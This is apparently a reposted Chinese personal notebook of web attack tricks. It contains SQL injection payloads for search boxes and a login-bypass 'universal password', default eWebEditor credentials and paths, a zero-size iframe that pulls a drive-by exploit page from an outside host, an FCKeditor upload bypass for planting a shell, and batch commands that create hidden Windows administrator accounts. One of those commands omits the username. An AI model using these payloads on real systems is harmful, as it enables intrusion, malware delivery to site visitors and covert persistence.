将平时所学到的漏洞记录...
====================================================================
寻找密码: conn.asp db.asp inc.asp
=====================================================================
(搜索框注入漏洞)
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'=' 方法:将语句输入到搜索框内
======================================================================
ewebeditor漏洞的利用
后台:admin/ewebeditor/admin_login.asp
数据库:admin/ewebeditor/db/ewebeditor.mdb
默认帐号密码:admin yzwcf606253 或 账号密码:cys158
http://地址/ewebeditor/ewebeditor.asp?id=样式id&style=样式名称
==============================================================
新的万能密码
帐号:' UNION SELECT 1,1,1 FROM admin WHERE ''='
密码:1
=============================================================
框架挂马
<iframe src=http://www.ktehack.cn/Ms07004.html width=0 height=0></iframe>
========================================================================
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList
=======================================================================
留言本写入一句话,连接http://www.j6899.com
======================================================================
FCK编辑器绕过“.”转化为“_”的方法。
绕过地址:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 会创建一个shell的目录
====================================================================
用作欺骗上传
<input name="FileName" type="FILE" class="tx1" size="20">
====================================================================
发布日期:2010-09.01
发布作者:only_guest
影响版本:js6899.com
官方地址:www.js6899.com
漏洞类型:设计错误
漏洞描述:可以通过特殊字符建立隐藏账户.命令行界面下不显示,用户管理面板中显示为空.非$..
详细说明:可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:
net user 123 /add
net localgroup administrators /add
注意其中的空白字符.非空格.
建立后命令行下用net user命令查看账户显示为空白,在用户界面中同样显示空白.
建立此帐号后无法在mstsc中直接输入登陆,需要在远程桌面的选项面板的常规选项卡中的用户名一栏里用智能ABC的V9输入特殊字符后再次连接.
漏洞证明:新建一个批处理,内容如下.
net user 123 /add
net localgroup administrators /add
执行后查看用户管理界面,看看是否有个空白帐号.
修复方案:过滤这些特殊字符吧.
=====================================================================
转载于:https://blog.51cto.com/wellcome/1394515